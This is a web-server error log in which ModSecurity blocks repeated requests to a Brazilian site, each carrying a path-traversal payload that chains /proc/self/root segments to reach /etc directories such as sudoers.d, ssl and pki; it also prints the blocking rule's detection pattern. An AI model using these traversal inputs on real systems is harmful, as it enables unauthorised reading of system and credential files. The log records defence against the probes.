https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:33.899827 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.241.46:53190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCdY6lpbStxTqkSktgEQAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:34.091594 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.243.203:48308] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCdglT9VtDQc7bgUyeFAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:35.091143 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:53198] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCd7ysWC90G-1nBrA2zwAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:36.538162 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.243.203:48322] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCeBXjF1vJNtV6CWrq-QAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:36.551043 2026] [:error] [pid 10651:tid 140411674785536] [client 74.7.241.46:53206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCeLysWC90G-1nBrA22gAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:37.899170 2026] [:error] [pid 11972:tid 140411641214720] [client 74.7.241.46:53212] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCeZqj1wV0Si-OkefayAAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:37.926156 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:48326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCebABkC4fWIHEf8Hc6AAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:39.067280 2026] [:error] [pid 10709:tid 140411599251200] [client 74.7.241.46:50534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCexXjF1vJNtV6CWrq_AAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:40.470855 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.241.46:50540] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCfJqj1wV0Si-OkefazAAAAAI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:41.971156 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:50552] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCfXbQATo66fKoS7w_NwAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:43.149279 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:50554] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCf3jZBu2q05ozVU9HigAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:43.899119 2026] [:error] [pid 10709:tid 140411557287680] [client 74.7.243.203:48334] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCfxXjF1vJNtV6CWrrAQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:44.355457 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.241.46:50566] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCgAlT9VtDQc7bgUyeGAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:45.179377 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:38890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCgZqj1wV0Si-Okefa1AAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:45.918581 2026] [:error] [pid 10709:tid 140411708356352] [client 74.7.241.46:50582] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCgRXjF1vJNtV6CWrrAgAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:46.528468 2026] [:error] [pid 21946:tid 140411666392832] [client 74.7.243.203:38894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCgnbQATo66fKoS7w_OwAAAMk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:47.091696 2026] [:error] [pid 21946:tid 140411624429312] [client 74.7.241.46:50584] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCg3bQATo66fKoS7w_PAAAAM4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:47.729438 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:38908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgCg7ysWC90G-1nBrA23AAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:48.399388 2026] [:error] [pid 21533:tid 140411574073088] [client 74.7.241.46:52106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgChHjZBu2q05ozVU9HiwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:49.091298 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.243.203:38912] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgChdSswJuvopo3lOhR6wAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:49.727323 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:52108] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgChZqj1wV0Si-Okefa3AAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:15:50.419541 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:33558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag 